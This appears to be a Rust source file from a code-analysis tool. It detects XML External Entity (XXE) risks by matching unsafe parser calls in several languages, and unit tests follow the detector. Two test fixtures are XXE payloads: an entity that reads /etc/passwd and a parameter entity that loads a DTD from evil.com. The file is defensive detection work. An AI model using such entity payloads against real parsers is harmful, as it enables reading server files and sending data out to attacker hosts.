stemedb/applications/aphoria/src/extractors/xxe.rs
jml 3b5f88b4f0 feat(aphoria): implement claims architecture (A1-A5) with verify engine, corpus, coverage, and explain
Complete Aphoria claims system overhaul:
- A1: Rename ExtractedClaim to Observation (extractors produce observations, not claims)
- A2: Add AuthoredClaim with full provenance, invariants, and authority tiers
- A3: Verify engine comparing observations against authored claims, CLI + formatters
- A4: Corpus as first-class assertions with predicate indexing, authority lens, trust packs
- A5: Coverage analysis, explain/docs generation, self-audit extractor, claim suggester skill

Also includes: 42 extractors updated for Observation type, verifiable_predicates trait,
conflict detection with comparison modes, claims TOML persistence, Grafana dashboard,
backup/restore scripts, and comprehensive test coverage.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-08 09:11:47 +00:00

433 lines
14 KiB
Rust

//! XML External Entity (XXE) vulnerability extractor.
//!
//! Detects patterns where XML parsers are used without disabling external entity
//! processing, which can lead to data exfiltration, SSRF, or denial of service.
use regex::Regex;
use stemedb_core::types::ObjectValue;
use super::traits::{build_claim, Extractor};
use crate::types::{Observation, Language};
/// Extractor for XML External Entity (XXE) vulnerabilities.
///
/// Holds one compiled [`Regex`] per detection pattern; the patterns are built
/// once in [`XxeExtractor::new`] and reused for every line that is scanned.
///
/// Detects patterns indicating potentially unsafe XML parsing:
/// - Python: lxml, xml.etree, xml.dom.minidom, xml.sax
/// - JavaScript: xml2js, libxmljs
/// - Go: encoding/xml
/// - Java-style patterns (polyglot detection)
/// - DTD entity declarations
pub struct XxeExtractor {
// Python patterns
// `etree.` / `lxml.` followed by `parse(`, `fromstring(` or `XML(`.
python_lxml: Regex,
// `xml.etree.ElementTree.` / `ET.` followed by `parse(`, `fromstring(` or `XMLParser(`.
python_etree: Regex,
// `xml.dom.minidom.parse(` / `xml.dom.minidom.parseString(`.
python_minidom: Regex,
// `xml.sax.parse(`, `xml.sax.parseString(` or `xml.sax.make_parser(`.
python_sax: Regex,
// JavaScript patterns
// `xml2js.parseString(` / `xml2js.Parser(`.
js_xml2js: Regex,
// `libxmljs.parseXml(`.
js_libxmljs: Regex,
// Go patterns
// `xml.Unmarshal(` / `xml.NewDecoder(`.
go_xml: Regex,
// Java-style patterns
// Parser/factory type names followed by `.new` (e.g. `DocumentBuilderFactory.newInstance`).
java_xxe: Regex,
// DTD entity declaration
// `<!ENTITY name SYSTEM|PUBLIC`, including the `%` parameter-entity form.
entity_decl: Regex,
}
impl Default for XxeExtractor {
fn default() -> Self {
Self::new()
}
}
impl XxeExtractor {
    /// Build an XXE extractor, compiling every detection pattern up front.
    ///
    /// # Panics
    /// Panics if any regex pattern is invalid (programmer error).
    #[allow(clippy::expect_used)]
    pub fn new() -> Self {
        // Every pattern below is a literal in this function, so a failure to
        // compile is a bug in this file rather than a runtime condition.
        let compile = |pattern: &str| Regex::new(pattern).expect("valid regex");

        // Python: lxml/etree parse
        let python_lxml = compile(r#"(?:etree|lxml)\.(?:parse|fromstring|XML)\s*\("#);
        // Python: xml.etree.ElementTree
        let python_etree =
            compile(r#"(?:xml\.etree\.ElementTree|ET)\.(?:parse|fromstring|XMLParser)\s*\("#);
        // Python: xml.dom.minidom
        let python_minidom = compile(r#"xml\.dom\.minidom\.(?:parse|parseString)\s*\("#);
        // Python: xml.sax
        let python_sax = compile(r#"xml\.sax\.(?:parse|parseString|make_parser)\s*\("#);

        // JavaScript: xml2js
        let js_xml2js = compile(r#"xml2js\.(?:parseString|Parser)\s*\("#);
        // JavaScript: libxmljs
        let js_libxmljs = compile(r#"libxmljs\.parseXml\s*\("#);

        // Go: encoding/xml
        let go_xml = compile(r#"xml\.(?:Unmarshal|NewDecoder)\s*\("#);

        // Java-style patterns (polyglot detection in config files, etc.)
        let java_xxe = compile(
            r#"(?:DocumentBuilder|SAXParser|XMLReader|TransformerFactory)(?:Factory)?\.new"#,
        );

        // DTD entity declaration (dangerous in untrusted XML)
        let entity_decl = compile(r#"<!ENTITY\s+(?:%\s+)?\w+\s+(?:SYSTEM|PUBLIC)"#);

        Self {
            python_lxml,
            python_etree,
            python_minidom,
            python_sax,
            js_xml2js,
            js_libxmljs,
            go_xml,
            java_xxe,
            entity_decl,
        }
    }

    /// Build one [`Observation`] for a matched XML-parsing pattern.
    ///
    /// Thin wrapper over `build_claim` that always supplies the fixed
    /// `["xml", "parsing"]` segments and the `"parser_config"` string, and
    /// wraps `parser` in [`ObjectValue::Text`]. All remaining arguments are
    /// forwarded unchanged.
    fn make_claim(
        path_segments: &[String],
        file: &str,
        line: usize,
        matched: &str,
        parser: &str,
        confidence: f32,
        description: &str,
    ) -> Observation {
        let parser_value = ObjectValue::Text(parser.to_owned());
        build_claim(
            path_segments,
            &["xml", "parsing"],
            "parser_config",
            parser_value,
            file,
            line,
            matched,
            confidence,
            description,
        )
    }
}
impl Extractor for XxeExtractor {
    /// Identifier of this extractor: `"xxe"`.
    fn name(&self) -> &str {
        "xxe"
    }

    /// Languages this extractor declares: Python, JavaScript, TypeScript and Go.
    fn languages(&self) -> &[Language] {
        &[Language::Python, Language::JavaScript, Language::TypeScript, Language::Go]
    }

    /// Scan `content` line by line and emit one observation per matched pattern.
    ///
    /// For every line, in this order:
    /// 1. the DTD `<!ENTITY ... SYSTEM|PUBLIC` check runs regardless of `language`;
    /// 2. the checks specific to `language` run (Python, JavaScript/TypeScript, Go);
    /// 3. the Java-style parser check runs regardless of `language`.
    ///
    /// Each pattern contributes at most one observation per line (only the
    /// first match on the line is used). Reported line numbers are 1-based.
    fn extract(
        &self,
        path_segments: &[String],
        content: &str,
        language: Language,
        file: &str,
    ) -> Vec<Observation> {
        let mut claims = Vec::new();
        // Whether the file mentions `defusedxml` anywhere. This is invariant
        // across lines, so it is computed lazily on the first lxml match and
        // then reused instead of rescanning the whole file for every match.
        let mut mentions_defusedxml: Option<bool> = None;

        for (line_idx, line) in content.lines().enumerate() {
            let line_num = line_idx + 1;

            // Check for DTD entity declarations (high risk in any context)
            if let Some(m) = self.entity_decl.find(line) {
                claims.push(Self::make_claim(
                    path_segments,
                    file,
                    line_num,
                    m.as_str(),
                    "dtd_entity",
                    0.95,
                    "DTD SYSTEM/PUBLIC entity declaration (XXE attack vector)",
                ));
            }

            match language {
                Language::Python => {
                    // lxml/etree (can be safe with proper configuration)
                    if let Some(m) = self.python_lxml.find(line) {
                        // Lower confidence if defusedxml is imported or resolve_entities=False.
                        // The cheap per-line test goes first; both tests are pure, so the
                        // result is the same whichever is evaluated first.
                        let mitigated = line.contains("resolve_entities=False")
                            || *mentions_defusedxml
                                .get_or_insert_with(|| content.contains("defusedxml"));
                        let confidence = if mitigated { 0.5 } else { 0.85 };
                        claims.push(Self::make_claim(
                            path_segments,
                            file,
                            line_num,
                            m.as_str(),
                            "lxml",
                            confidence,
                            "lxml XML parsing may be vulnerable to XXE without proper config",
                        ));
                    }
                    // xml.etree.ElementTree
                    if let Some(m) = self.python_etree.find(line) {
                        // Python 3.8+ has some protections, but external entities still a concern
                        claims.push(Self::make_claim(
                            path_segments,
                            file,
                            line_num,
                            m.as_str(),
                            "elementtree",
                            0.75,
                            "xml.etree.ElementTree may allow external entity expansion",
                        ));
                    }
                    // xml.dom.minidom (vulnerable by default)
                    if let Some(m) = self.python_minidom.find(line) {
                        claims.push(Self::make_claim(
                            path_segments,
                            file,
                            line_num,
                            m.as_str(),
                            "minidom",
                            0.85,
                            "xml.dom.minidom is vulnerable to XXE attacks",
                        ));
                    }
                    // xml.sax (needs feature flags to be safe)
                    if let Some(m) = self.python_sax.find(line) {
                        claims.push(Self::make_claim(
                            path_segments,
                            file,
                            line_num,
                            m.as_str(),
                            "sax",
                            0.85,
                            "xml.sax is vulnerable to XXE without feature_external_ges=False",
                        ));
                    }
                }
                Language::JavaScript | Language::TypeScript => {
                    // xml2js (generally safer, but can be misconfigured)
                    if let Some(m) = self.js_xml2js.find(line) {
                        claims.push(Self::make_claim(
                            path_segments,
                            file,
                            line_num,
                            m.as_str(),
                            "xml2js",
                            0.7,
                            "xml2js XML parsing - verify external entity settings",
                        ));
                    }
                    // libxmljs (can be vulnerable)
                    if let Some(m) = self.js_libxmljs.find(line) {
                        claims.push(Self::make_claim(
                            path_segments,
                            file,
                            line_num,
                            m.as_str(),
                            "libxmljs",
                            0.85,
                            "libxmljs may be vulnerable to XXE attacks",
                        ));
                    }
                }
                Language::Go => {
                    // encoding/xml (safer by default, but DTD expansion can be issue)
                    if let Some(m) = self.go_xml.find(line) {
                        claims.push(Self::make_claim(
                            path_segments,
                            file,
                            line_num,
                            m.as_str(),
                            "encoding_xml",
                            0.65,
                            "Go xml package - generally safe but verify with untrusted input",
                        ));
                    }
                }
                _ => {}
            }

            // Check for Java patterns (polyglot detection)
            if let Some(m) = self.java_xxe.find(line) {
                claims.push(Self::make_claim(
                    path_segments,
                    file,
                    line_num,
                    m.as_str(),
                    "java_parser",
                    0.9,
                    "Java XML parser - requires feature flags to prevent XXE",
                ));
            }
        }

        claims
    }
}
#[cfg(test)]
mod tests {
    use super::*;

    /// Run a freshly built extractor over `content`, using `segment` as the
    /// only path segment, and return whatever it reports.
    fn scan(segment: &str, content: &str, language: Language, file: &str) -> Vec<Observation> {
        let segments = [segment.to_string()];
        XxeExtractor::new().extract(&segments, content, language, file)
    }

    #[test]
    fn test_python_lxml() {
        let source = r#"
doc = etree.parse(xml_file)
"#;
        let found = scan("python", source, Language::Python, "parser.py");
        assert_eq!(found.len(), 1);
        assert!(found[0].concept_path.contains("xml/parsing"));
    }

    #[test]
    fn test_python_lxml_with_defusedxml() {
        let source = r#"
import defusedxml.ElementTree as ET
doc = etree.parse(xml_file)
"#;
        let found = scan("python", source, Language::Python, "parser.py");
        // Still reported, but with reduced confidence.
        assert_eq!(found.len(), 1);
        assert!(found[0].confidence < 0.6);
    }

    #[test]
    fn test_python_elementtree() {
        let source = r#"
import xml.etree.ElementTree as ET
tree = ET.parse(source)
"#;
        let found = scan("python", source, Language::Python, "xml.py");
        assert_eq!(found.len(), 1);
    }

    #[test]
    fn test_python_minidom() {
        let source = r#"
from xml.dom.minidom import parse
doc = xml.dom.minidom.parse(xml_string)
"#;
        let found = scan("python", source, Language::Python, "parser.py");
        assert_eq!(found.len(), 1);
        assert!(found[0].description.contains("minidom"));
    }

    #[test]
    fn test_python_sax() {
        let source = r#"
xml.sax.parse(source, handler)
"#;
        let found = scan("python", source, Language::Python, "handler.py");
        assert_eq!(found.len(), 1);
    }

    #[test]
    fn test_js_xml2js() {
        let source = r#"
xml2js.parseString(xmlData, callback);
"#;
        let found = scan("js", source, Language::JavaScript, "parser.js");
        assert_eq!(found.len(), 1);
    }

    #[test]
    fn test_js_libxmljs() {
        let source = r#"
const doc = libxmljs.parseXml(xmlString);
"#;
        let found = scan("js", source, Language::JavaScript, "parser.js");
        assert_eq!(found.len(), 1);
    }

    #[test]
    fn test_go_xml() {
        let source = r#"
err := xml.Unmarshal(data, &result)
"#;
        let found = scan("go", source, Language::Go, "parser.go");
        assert_eq!(found.len(), 1);
    }

    #[test]
    fn test_java_parser() {
        // The Java-style check is language-independent, so it fires under Python too.
        let source = r#"
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
"#;
        let found = scan("python", source, Language::Python, "mixed.py");
        assert_eq!(found.len(), 1);
        assert!(found[0].description.contains("Java"));
    }

    #[test]
    fn test_dtd_entity() {
        let source = r#"
<!ENTITY xxe SYSTEM "file:///etc/passwd">
"#;
        // Use a non-test filename to avoid confidence reduction
        let found = scan("python", source, Language::Python, "parser.xml");
        assert_eq!(found.len(), 1);
        assert!(found[0].confidence >= 0.9);
        assert!(found[0].description.contains("XXE attack vector"));
    }

    #[test]
    fn test_dtd_public_entity() {
        let source = r#"
<!ENTITY % remote PUBLIC "http://evil.com/evil.dtd">
"#;
        let found = scan("python", source, Language::Python, "test.xml");
        assert_eq!(found.len(), 1);
    }
}